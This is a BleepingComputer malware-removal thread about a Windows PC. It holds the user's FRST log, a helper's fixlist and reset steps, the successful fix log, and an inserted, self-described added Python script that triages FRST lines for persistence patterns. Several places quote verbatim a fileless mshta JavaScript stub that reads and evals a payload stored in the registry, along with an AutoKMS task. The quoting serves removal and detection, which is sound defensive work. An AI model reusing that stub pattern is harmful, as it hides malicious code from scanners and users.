2016-12-30 19:33 - 2016-12-05 01:42 - 00001111 _____ C:\Users\Jeff\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Bitdefender Antivirus Free.lnk
2016-12-30 19:33 - 2016-12-05 01:27 - 00001318 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-12-30 19:33 - 2016-12-05 01:27 - 00001300 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-12-30 19:33 - 2016-12-05 01:10 - 00001019 _____ C:\Users\Jeff\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2016-12-30 19:24 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\security
2016-12-30 19:09 - 2016-12-05 01:09 - 00000000 ___RD C:\Users\Jeff\AppData\Roaming\Microsoft\Windows\Start Menu\Programs
2016-12-30 19:07 - 2013-08-22 07:36 - 00000000 ____D C:\Program Files\Common Files
2016-12-30 13:40 - 2016-12-05 02:26 - 00000000 ____D C:\Program Files (x86)\Hearthstone
2016-12-29 20:46 - 2013-08-22 09:36 - 00000000 __RSD C:\WINDOWS\assembly
2016-12-29 20:21 - 2013-08-22 09:36 - 00000000 ___RD C:\WINDOWS\DesktopTileResources
2016-12-29 20:01 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\system32\catroot2
2016-12-28 21:44 - 2016-12-05 01:09 - 00000000 ____D C:\Users\Jeff
2016-12-28 21:24 - 2016-12-11 05:43 - 00000000 __RDO C:\Users\Jeff\OneDrive
2016-12-28 21:24 - 2013-08-22 08:44 - 00337808 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-12-28 21:20 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\system32\wdi
2016-12-28 21:16 - 2016-12-05 03:00 - 00524288 ___SH C:\WINDOWS\system32\config\DRIVERS{e1793794-0b3d-11e3-9dfe-80de722c933b}.TMContainer00000000000000000001.regtrans-ms
2016-12-28 21:16 - 2016-12-05 03:00 - 00065536 ___SH C:\WINDOWS\system32\config\DRIVERS{e1793794-0b3d-11e3-9dfe-80de722c933b}.TM.blf
2016-12-28 21:15 - 2013-08-22 09:36 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2016-12-28 21:15 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\system32\sr-Latn-RS
2016-12-28 21:15 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\system32\sr-Latn-CS
2016-12-28 21:15 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\PolicyDefinitions
2016-12-28 21:14 - 2013-08-22 09:36 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2016-12-28 21:14 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\SysWOW64\en-US
2016-12-28 21:14 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\apppatch
2016-12-28 21:14 - 2013-08-22 07:36 - 00000000 __RSD C:\WINDOWS\Fonts
2016-12-28 21:14 - 2013-08-22 07:36 - 00000000 ____D C:\WINDOWS\system32\AdvancedInstallers
2016-12-28 21:05 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2016-12-27 21:46 - 2016-12-05 02:21 - 00000000 ____D C:\Users\Jeff\AppData\Roaming\Azureus
2016-12-22 16:42 - 2016-12-19 22:41 - 00835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2016-12-22 16:42 - 2016-12-19 22:41 - 00177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2016-12-20 00:09 - 2013-08-22 09:36 - 00001086 ___SH C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini
 
==================== Files in the root of some directories =======
 
2016-12-28 20:56 - 2016-12-28 20:56 - 0000004 _____ () C:\Users\Jeff\AppData\Roaming\4E9225DA0A29463E8AD95A233536E924.dat
2016-12-23 02:40 - 2016-12-23 02:40 - 0002092 _____ () C:\Users\Jeff\AppData\Local\recently-used.xbel
2017-01-10 22:14 - 2016-11-23 07:37 - 0000570 _____ () C:\Users\Jeff\AppData\Local\TroubleshooterConfig.json
2016-12-05 01:46 - 2016-12-05 01:46 - 0028752 _____ () C:\ProgramData\agent.1480923965.bdinstall.bin
2016-12-05 02:45 - 2016-12-05 02:45 - 0029169 _____ () C:\ProgramData\agent.1480927550.bdinstall.bin
2017-01-19 01:22 - 2017-01-19 01:22 - 0028750 _____ () C:\ProgramData\agent.1484810568.bdinstall.bin
 
Some files in TEMP:
====================
C:\Users\Jeff\AppData\Local\Temp\BluestacksUninstaller.exe
C:\Users\Jeff\AppData\Local\Temp\BSvcProcessor.exe
C:\Users\Jeff\AppData\Local\Temp\BSvcUpdater.exe
C:\Users\Jeff\AppData\Local\Temp\HD-LibraryHandler.dll
C:\Users\Jeff\AppData\Local\Temp\HD-Logger-Native.dll
C:\Users\Jeff\AppData\Local\Temp\i4jdel0.exe
C:\Users\Jeff\AppData\Local\Temp\libeay32.dll
C:\Users\Jeff\AppData\Local\Temp\msvcr120.dll
C:\Users\Jeff\AppData\Local\Temp\sqlite3.dll
C:\Users\Jeff\AppData\Local\Temp\tu17p84.exe
C:\Users\Jeff\AppData\Local\Temp\yjhkuvi.exe
 
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
LastRegBack: 2017-01-15 16:00
 
==================== End of FRST.txt ============================

Attached File: Addition.txt

#2 nasdaq

  • Malware Response Team
  • 38,580 posts
  • Gender:Male
  • Location:Montreal, QC. Canada

Posted 20 January 2017 - 10:46 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can, please print this topic; it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Press the Windows key + R on your keyboard at the same time. This will open the Run box.
Type Notepad and click OK.

Please copy the entire contents of the code box below to a new file.
 
Start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

CHR Extension: (Chrome Web Store Payments) - C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-01-18]
CHR Extension: (Chrome Media Router) - C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm 
Task: {19FC8040-E91D-4B72-BB12-05234193E3A2} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe [2016-12-05] ()
AlternateDataStreams: C:\Users\Jeff\Desktop\FRST64.exe:BDU [0]
AlternateDataStreams: C:\Users\Jeff\Downloads\EmsisoftEmergencyKit.exe:BDU [0]
AlternateDataStreams: C:\Users\Jeff\Downloads\HijackThis.exe:BDU [0]
AlternateDataStreams: C:\Users\Jeff\Downloads\tdsskiller.exe:BDU [0]
AlternateDataStreams: C:\Users\Jeff\Downloads\VuzeBittorrentClientInstaller.exe:BDU [0]
HKU\.DEFAULT\Software\Classes\bad076f6: "C:\WINDOWS\system32\mshta.exe" "javascript:xZM5x="gEfoLFdU";hz1=new ActiveXObject("WScript.Shell");n1drZ="lbjPNb";J99EyX=hz1.RegRead("HKCU\\software\\kftdyzuxkf\\vjvb");LOfh1="vuEF5";eval(J99EyX);c5QgkhnS="mD";" <===== ATTENTION
FirewallRules: [{FDBB883F-7EE4-452A-9467-1E6EF3910881}] => C:\WINDOWS\system32\config\systemprofile\AppData\Local\BrowserAir\Application\BrowserairExec.exe
C:\WINDOWS\AutoKMS
C:\WINDOWS\system32\config\systemprofile\AppData\Local\BrowserAir

Reboot:

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

Reset Chrome...
Open Google Chrome and click on the menu icon, which is located at the top right of the Google Chrome window.
 
Click "Settings" then "Show advanced settings" at the bottom of the screen.
 
Click "Reset browser settings" button.
 
Restart Chrome.
===

Please let me know what problem persists with this computer.
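The fixlist above goes after four kinds of artefact from the FRST log: a registry value that launches mshta.exe with an inline javascript: URL (the script reads a second stage from another registry value with RegRead and runs it with eval, so the payload never sits in a file that a scanner can hash), a scheduled task whose binary FRST lists with an empty publisher "()", a firewall allow-rule for an executable under the service profile's AppData, and alternate data streams on downloaded tools. As an added example that is not part of the original thread and is not FRST's own logic, the Python below parses log lines in the same shapes, flags those patterns, and assembles a fixlist skeleton in the layout nasdaq used. The sample lines are constructed from the log above, with one benign task and one benign firewall rule added for contrast; the "odd location" directory list is an assumption of this example, not an FRST rule.

```python
"""Triage FRST (Farbar Recovery Scan Tool) log lines for the persistence
patterns dealt with in this thread. Added example; not FRST's own logic."""
import re
from dataclasses import dataclass
from typing import Iterable, List

# Constructed sample in FRST's line format: the flagged lines are taken from the
# log posted above; the Google task and Firefox rule are benign lines added for contrast.
SAMPLE_LOG = r"""
Task: {19FC8040-E91D-4B72-BB12-05234193E3A2} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe [2016-12-05] ()
Task: {00000000-0000-0000-0000-000000000001} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-11-01] (Google Inc.)
AlternateDataStreams: C:\Users\Jeff\Downloads\tdsskiller.exe:BDU [0]
HKU\.DEFAULT\Software\Classes\bad076f6: "C:\WINDOWS\system32\mshta.exe" "javascript:xZM5x="gEfoLFdU";hz1=new ActiveXObject("WScript.Shell");J99EyX=hz1.RegRead("HKCU\\software\\kftdyzuxkf\\vjvb");eval(J99EyX);" <===== ATTENTION
FirewallRules: [{FDBB883F-7EE4-452A-9467-1E6EF3910881}] => C:\WINDOWS\system32\config\systemprofile\AppData\Local\BrowserAir\Application\BrowserairExec.exe
FirewallRules: [{00000000-0000-0000-0000-000000000002}] => C:\Program Files\Mozilla Firefox\firefox.exe
"""

# Line shapes as they appear in the log above.
RE_TASK = re.compile(r'^Task: \{[0-9A-Fa-f-]+\} - (?P<name>.+?) => (?P<path>.+?) '
                     r'\[\d{4}-\d{2}-\d{2}\] \((?P<publisher>[^)]*)\)')
RE_FIREWALL = re.compile(r'^FirewallRules: \[\{[0-9A-Fa-f-]+\}\] => (?P<path>.+)$')
RE_ADS = re.compile(r'^AlternateDataStreams: (?P<file>.+):(?P<stream>[^:\s]+) \[(?P<size>\d+)\]$')
RE_REGREAD = re.compile(r'RegRead\("([^"]+)"\)')

# Heuristic (assumption of this example, not an FRST rule): software is not normally
# installed under the service profile or a Temp folder, so allow-rules there deserve a look.
ODD_EXE_DIRS = ('\\config\\systemprofile\\', '\\appdata\\local\\temp\\')


@dataclass
class Finding:
    rule: str
    line: str
    detail: str = ''


def triage(log_text: str) -> List[Finding]:
    """Return one Finding per log line that matches a persistence pattern."""
    findings: List[Finding] = []
    for raw in log_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        low = line.lower()
        # 1. Registry value running mshta.exe with an inline javascript:/vbscript: URL.
        #    RegRead(...) plus eval(...) means the real payload is a second registry
        #    value, so there is no file on disk for a scanner to find.
        if 'mshta.exe' in low and ('javascript:' in low or 'vbscript:' in low):
            rule, detail = 'mshta-inline-script', ''
            m = RE_REGREAD.search(line)
            if m and 'eval(' in low:
                rule += '+registry-second-stage'
                detail = m.group(1).replace('\\\\', '\\')  # un-escape the JS string literal
            findings.append(Finding(rule, line, detail))
            continue
        # 2. Scheduled task whose binary is listed with an empty publisher "()".
        m = RE_TASK.match(line)
        if m:
            if not m.group('publisher').strip():
                findings.append(Finding('task-no-publisher', line, m.group('path')))
            continue
        # 3. Firewall allow-rule for an executable in a location software is not installed to.
        m = RE_FIREWALL.match(line)
        if m:
            path = m.group('path')
            if any(d in path.lower() for d in ODD_EXE_DIRS):
                findings.append(Finding('firewall-rule-odd-location', line, path))
            continue
        # 4. Alternate data streams on executables: listed for review, not proof of infection.
        m = RE_ADS.match(line)
        if m:
            findings.append(Finding('alternate-data-stream', line, m.group('stream')))
    return findings


def build_fixlist(findings: Iterable[Finding], extra_paths: Iterable[str] = ()) -> str:
    """Assemble fixlist.txt in the layout used in this thread. FRST takes the flagged
    log lines verbatim; extra_paths are folders to remove (e.g. the task's home directory).
    Every line must still be reviewed by a person before Fix is clicked."""
    body = [f.line for f in findings] + list(extra_paths)
    lines = ['Start', '', 'CreateRestorePoint:', 'EmptyTemp:', 'CloseProcesses:', '',
             *body, '', 'Reboot:', '', 'End']
    return '\n'.join(lines)


if __name__ == '__main__':
    found = triage(SAMPLE_LOG)
    for f in found:
        print(f'{f.rule:42} {f.detail or f.line[:60]}')
    print()
    print(build_fixlist(found, extra_paths=[r'C:\WINDOWS\AutoKMS']))
```

Running it prints the four findings and the fixlist skeleton. The detail on the mshta finding is the registry value the stub reads at run time; exporting that value before running the fix is the quickest way to see what the redirect actually loaded, since the fix deletes the launcher key and the evidence with it.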


#4 romeoashe

  • Topic Starter
  • Members
  • 4 posts

Posted 21 January 2017 - 12:30 AM

Thank you nasdaq. Here is the requested log:

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 18-01-2017
Ran by Jeff (20-01-2017 23:16:58) Run:1
Running from C:\Users\Jeff\Desktop
Loaded Profiles: Jeff (Available Profiles: Jeff)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
Start
 
CreateRestorePoint:
EmptyTemp:
CloseProcesses:
 
CHR Extension: (Chrome Web Store Payments) - C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-01-18]
CHR Extension: (Chrome Media Router) - C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm 
Task: {19FC8040-E91D-4B72-BB12-05234193E3A2} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe [2016-12-05] ()
AlternateDataStreams: C:\Users\Jeff\Desktop\FRST64.exe:BDU [0]
AlternateDataStreams: C:\Users\Jeff\Downloads\EmsisoftEmergencyKit.exe:BDU [0]
AlternateDataStreams: C:\Users\Jeff\Downloads\HijackThis.exe:BDU [0]
AlternateDataStreams: C:\Users\Jeff\Downloads\tdsskiller.exe:BDU [0]
AlternateDataStreams: C:\Users\Jeff\Downloads\VuzeBittorrentClientInstaller.exe:BDU [0]
HKU\.DEFAULT\Software\Classes\bad076f6: "C:\WINDOWS\system32\mshta.exe" "javascript:xZM5x="gEfoLFdU";hz1=new ActiveXObject("WScript.Shell");n1drZ="lbjPNb";J99EyX=hz1.RegRead("HKCU\\software\\kftdyzuxkf\\vjvb");LOfh1="vuEF5";eval(J99EyX);c5QgkhnS="mD";" <===== ATTENTION
FirewallRules: [{FDBB883F-7EE4-452A-9467-1E6EF3910881}] => C:\WINDOWS\system32\config\systemprofile\AppData\Local\BrowserAir\Application\BrowserairExec.exe
C:\WINDOWS\AutoKMS
C:\WINDOWS\system32\config\systemprofile\AppData\Local\BrowserAir
 
Reboot:
 
End
*****************
 
Restore point was successfully created.
Processes closed successfully.
C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda => moved successfully
CHR Extension: (Chrome Media Router) - C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm => not found
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{19FC8040-E91D-4B72-BB12-05234193E3A2} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{19FC8040-E91D-4B72-BB12-05234193E3A2} => key removed successfully
C:\WINDOWS\System32\Tasks\AutoKMS => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AutoKMS => key removed successfully
C:\Users\Jeff\Desktop\FRST64.exe => ":BDU" ADS removed successfully.
C:\Users\Jeff\Downloads\EmsisoftEmergencyKit.exe => ":BDU" ADS removed successfully.
C:\Users\Jeff\Downloads\HijackThis.exe => ":BDU" ADS removed successfully.
C:\Users\Jeff\Downloads\tdsskiller.exe => ":BDU" ADS removed successfully.
C:\Users\Jeff\Downloads\VuzeBittorrentClientInstaller.exe => ":BDU" ADS removed successfully.
HKU\.DEFAULT\Software\Classes\bad076f6 => key removed successfully
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{FDBB883F-7EE4-452A-9467-1E6EF3910881} => value removed successfully
C:\WINDOWS\AutoKMS => moved successfully
"C:\WINDOWS\system32\config\systemprofile\AppData\Local\BrowserAir" => not found.
 
=========== EmptyTemp: ==========
 
BITS transfer queue => 50331648 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 7591866 B
Java, Flash, Steam htmlcache => 713 B
Windows/system/drivers => 54567660 B
Edge => 0 B
Chrome => 804750948 B
Firefox => 0 B
Opera => 0 B
 
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 147492 B
systemprofile32 => 53208346 B
LocalService => 25097 B
NetworkService => 5066 B
Jeff => 189827290 B
 
RecycleBin => 15870727187 B
EmptyTemp: => 15.9 GB temporary data Removed.
 
================================
 
 
The system needed a reboot.
 
==== End of Fixlog 23:19:25 ====
 
 
This appears to have resolved my issue :)


#5 nasdaq

  • Malware Response Team
  • 38,580 posts
  • Location: Montreal, QC. Canada

Posted 21 January 2017 - 08:40 AM

If all is well.

To learn more about how to protect yourself while on the internet, read this little guide on best security practices to keep safe.
http://www.bleepingcomputer.com/forums/t/407147/answers-to-common-security-questions-best-practices/



